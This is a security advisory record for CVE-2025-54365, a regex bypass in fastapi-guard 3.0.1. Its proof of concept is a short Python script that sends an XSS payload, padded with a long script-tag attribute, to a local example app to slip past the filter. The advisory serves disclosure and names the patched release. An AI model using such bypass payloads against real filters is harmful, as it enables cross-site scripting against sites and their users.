{"id":"CVE-2025-54365","aliases":["GHSA-rrf6-pxg8-684g","PYSEC-2026-1360"],"title":"FastAPI Guard has a regex bypass","summary":"FastAPI Guard has a regex bypass","severity":"high","vendor":"fastapi-guard","product":"fastapi-guard","ecosystem":"pip","affected":["fastapi-guard >= 3.0.1, < 3.0.2"],"patched":["fastapi-guard 3.0.2"],"published":"2025-07-23","updated":"2026-09-10","sourceUpdated":"2026-09-10T03:50:26.308489240Z","source":"OSV","sourceUrl":"https://osv.dev/vulnerability/GHSA-rrf6-pxg8-684g","references":[{"url":"https://github.com/rennf93/fastapi-guard/security/advisories/GHSA-rrf6-pxg8-684g"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54365"},{"url":"https://github.com/rennf93/fastapi-guard/commit/0829292c322d33dc14ab00c5451c5c138148035a"},{"url":"https://github.com/rennf93/fastapi-guard/commit/d9d50e8130b7b434cdc1b001b8cfd03a06729f7f"},{"url":"https://github.com/rennf93/fastapi-guard"}],"tags":["osv","pip"],"epss":0.00764,"epssPercentile":0.53526,"ingestedAt":"2026-07-08T18:25:53.010Z","slug":"CVE-2025-54365","body":"## Overview\n\n### Summary\n\nThe regular expression patched to mitigate the ReDoS vulnerability by limiting the length of string fails to catch inputs that exceed this limit.\n\n### Details\n\nIn version 3.0.1, you can find a commit like the one in the link below, which was made to prevent ReDoS.\nhttps://github.com/rennf93/fastapi-guard/commit/d9d50e8130b7b434cdc1b001b8cfd03a06729f7f\n\nThis commit mitigates the vulnerability by limiting the length of the input string, as shown in the example below.\n`r\"<script[^>]*>[^<]*<\\\\/script\\\\s*>\"` -> `<script[^>]{0,100}>[^<]{0,1000}<\\\\/script\\\\s{0,10}>`\n\nThis type of patch fails to catch cases where the string representing the attributes of a <script> tag exceeds 100 characters.\nTherefore, most of the regex patterns present in version 3.0.1 can be bypassed.\n\n### PoC\n\n1. clone the fastapi-guard repository\n2. Navigate to the examples directory and modify the main.py source code. Change the HTTP method for the root route from GET to POST.\n<img width=\"1013\" height=\"554\" alt=\"image\" src=\"https://github.com/user-attachments/assets/cf93ea37-2fd7-4251-abb6-b55f88685f54\" />\n3. After that, set up the example app environment by running the docker-compose up command. Then, run the Python code below to verify that the two requests return different results.\n\n```python\nimport requests\n\nURL = \"<http://localhost:8000>\"\n\nobvious_payload = {\n    \"obvious\" : \"<script>alert(1);</script>\"\n}\nresponse = requests.post(url=URL, json=obvious_payload)\nprint(f\"[+] response of first request: {response.text}\")\n\nbypassed_payload = {\n    \"suspicious\" : f'<script id=\"i_can_bypass_regex_filtering{'a'*100}\">alert(1)</script>'\n}\n\nresponse = requests.post(url=URL, json=bypassed_payload)\nprint(f\"[+] response of second request: {response.text}\")\n\n```\n<img width=\"836\" height=\"112\" alt=\"image\" src=\"https://github.com/user-attachments/assets/11dcccb2-6179-44b1-9628-ae0a787e3bb7\" />\n\n### Impact\n\nDue to this vulnerability, most of the regex patterns can potentially be bypassed, making the application vulnerable to attacks such as XSS and SQL Injection.\n\n## Affected packages\n\n- `fastapi-guard >= 3.0.1, < 3.0.2`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `fastapi-guard 3.0.2`","depth":"twilight","depthScore":41,"depthScoreParts":{"impact":41.3,"likelihood":0.2,"exploitation":0,"ransomware":0},"changes":[]}